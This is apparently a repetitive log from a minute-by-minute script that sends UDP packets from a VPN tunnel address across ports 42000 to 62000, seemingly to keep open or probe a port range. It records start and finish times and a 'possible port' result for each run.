-Finished port fill at 2020-09-06 15:30:04 -Starting port fill at 2020-09-06 15:31:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 15:31:04 -Starting port fill at 2020-09-06 15:32:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 15:32:05 -Starting port fill at 2020-09-06 15:33:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 15:33:05 -Starting port fill at 2020-09-06 15:34:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 15:34:05 -Starting port fill at 2020-09-06 15:35:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 15:35:05 -Starting port fill at 2020-09-06 15:36:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 15:36:07 -Starting port fill at 2020-09-06 15:37:02 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 15:37:07 -Starting port fill at 2020-09-06 15:38:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 15:38:06 -Starting port fill at 2020-09-06 15:39:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 15:39:06 -Starting port fill at 2020-09-06 15:40:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 15:40:06 -Starting port fill at 2020-09-06 15:41:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 15:41:06 -Starting port fill at 2020-09-06 15:42:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 15:42:04 -Starting port fill at 2020-09-06 15:43:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 15:43:04 -Starting port fill at 2020-09-06 15:44:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 15:44:04 -Starting port fill at 2020-09-06 15:45:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 15:45:06 -Starting port fill at 2020-09-06 15:46:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 15:46:05 -Starting port fill at 2020-09-06 15:47:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 15:47:05 -Starting port fill at 2020-09-06 15:48:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 15:48:05 -Starting port fill at 2020-09-06 15:49:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 15:49:05 -Starting port fill at 2020-09-06 15:50:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 15:50:05 -Starting port fill at 2020-09-06 15:51:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 15:51:05 -Starting port fill at 2020-09-06 15:52:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 15:52:05 -Starting port fill at 2020-09-06 15:53:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 15:53:05 -Starting port fill at 2020-09-06 15:54:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 15:54:05 -Starting port fill at 2020-09-06 15:55:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 15:55:05 -Starting port fill at 2020-09-06 15:56:02 -Using tun src ip: 10.8.0.10 